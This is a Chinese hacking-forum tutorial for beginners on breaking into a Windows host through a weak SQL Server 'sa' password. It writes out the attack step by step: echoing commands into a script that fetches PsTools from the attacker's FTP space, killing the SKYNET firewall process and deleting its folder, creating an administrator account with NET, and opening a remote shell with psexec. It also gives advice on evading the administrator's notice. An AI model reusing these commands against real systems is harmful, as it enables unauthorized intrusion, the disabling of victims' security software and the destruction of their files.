论坛: 菜鸟乐园 标题: 当sa遇上防火墙 复制本贴地址    
作者: wish [wish259]    论坛用户   登录

      网络上最受菜鸟欢迎入侵方式相信是对弱口令的扫描利用,因为菜鸟们能很容易地利用扫到的弱口令
来控制一台主机,这种方法既简单又容易入门,是提高菜鸟学黑兴趣的最好方法。但是天下不可能尽是毫
无防范意识的网管,再粗心的网管相信大部分也会给自己的电脑装上防火墙或杀毒工具,这样就为菜鸟们
的前进设下了一道门槛。有些防火墙将让你无法连接辛辛苦苦在肉鸡上开的服务或后门,无法NET,无法TELNET,
无法FTP,无法3389的话,那还谈什么入侵?如果你也是得到了SQL-Sever弱口令和密码,却无法摆平对方
的防火墙的话,请不要急,也许下文能帮你解决你所遇到的问题。
 
  准备工作,先申请一个免费的FTP空间,不需要太大,一般10M就已经足够了。
 
  下文要用到的是PSTOOLS这套命令软件,先把PSTOOLS上传到FTP空间,注意,这里并不是说把PSTOOLS整个
压缩包上传,而是把它解压缩后所有的exe文件上传,然后再把一些你认为会常用到的工具上传,例如SRV,
开3389或配置好的木马端之类的执行文件,以便以后在任何地方都可以下载。
 
    好了,现在的开始前提是你已经得到了SQL-Sever弱口令,用户是sa,密码也是sa.我们先打开WINNTAutoAttack
这款工具,然后来到SQLCMD执行这一栏,填入IP,用户和密码然后连接。连接之后,我们就可以在CMD行里敲入DOS
命令来获取住机的信息了。因为这次攻击目的是为了屏蔽对方的防火墙,所以我们先要对症下药,找到对方安装的
是什么防火墙。输入dir c:\progra~1,果然不出所料,发现了SKYNET这样一个目录,再进去一些就找到了主执行文
件PFW.EXE。这时可能有些朋友会有疑问,如果我们用命令把整个SKYNET删除了不就可以把防火墙关了吗?其实不是
的,有电脑使用经验的人都应该知道,正在使用的文件是无法删除的,作者在自己电脑上做试验时发现会弹出"文件正
在使用,无法删除"的对话框,至于在远程电脑上会不会显示出这样的警告就不得而知了,但是老大,你是在入侵!!凡事都得小
心为上,如果因为一时的急进而让管理员发现了端倪,那就前功尽弃了。
 
    到了这步,我们的FTP空间终于派上用场了。但是SQLCMD里只能一次执行一行的命令,
而无法象正常在CMD里输入FTP命令那样输入用户和密码。这时我们就用到了ECHO命令。
先在记事本上写下下面几行命令:                   
                                                          说明:
echo open ftp.go.nease.net>>tan.txt    open后填入的是FTP空间地址
echo yourname>>tan.txt                      echo后填入你的用户名
echo password>>tan.txt                      echo后填入你的密码
echo bin>>tan.txt                                bin:使用二进制文件传输方式
echo get pslist.exe>>tan.txt                用get命令从你的FTP空间上载文件
echo get pskill.exe>>tan.txt
echo bye>>tan.txt                              bye命令退出FTP


  这样做的目的最终只是为了在SQLCMD里执行FTP的自动下载功能,因为在FTP命令后加一个参数-S:filename
可以执行文档里面预先写好的命令,而echo >>tan.txt的作用就是把FTP命令写进一个新建立的叫tan.txt文
档里。
 
    在SQLCMD里逐行写入执行echo命令后,我们就可以输入ftp -s:tan.txt来下载文件了。不一会儿,我们要
用到的PSTOOLS里的两个工具pslist.exe和pskill.exe就下回来了。赶快在SQLCMD里输入pslist.exe查看一下
进程列表,怎么样,对方的电脑进程是不是一览无遗了呢?然后我们就可以用pskill.exe来杀进程了。在进程
列表里我发现了正在运行的防火墙PFW.exe,它的PID(进程ID)是912,先KILL了再说,输入pskill.exe 912,
哈!成功喇!这时如果我们狠一点的话,就可以再输入命令把天网整个目录给删了,因为防火墙已经停止运行
了啊!这样就可以给自己留后门多留一点时间了,继续执行del c:\progra~1\skynet\*.* /q,del命令后加上/q
参数后就会不进行询问直接删除指定目录上的文件了。再dir看看天网目录,里面的东西已经没了!这时你就可
以放心的做自己想做各种远程连接而不用担心被防火墙拒之门外了!
 
    最后再介绍一个简单跳入对方CMD的方法,还是在SQLCMD里,先用NET建立一个超级用户,不懂的朋友可以参
考一下有关NET命令的使用方法  ,然后在自己的电脑上使用PSTOOLS里一个叫psexec.exe的命令,在本地CMD里
进入到PSTOOLS目录底下,键入psexec.exe \\ip -u yourname -p password cmd.exe命令成功后在对方的cmd里喇,
比起还要通过NTLM验证的TELNET是不是方便了很多呢?哈哈,PSTOOLS真是一套强大完美的NT管理工具啊!

其实文章是有很多截图的..但不好放上来只好作罢...我想,肯定很多菜鸟说一头雾水喇..哈哈```不过有人能看完我已经很安慰了..
可能遇到这种情况的机会不多,但是当中运用到的方法大概也值得借鉴吧..
希望你们看完后能有点收获.    :)
                                             

地主 发表时间: 04-07-06 00:56

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号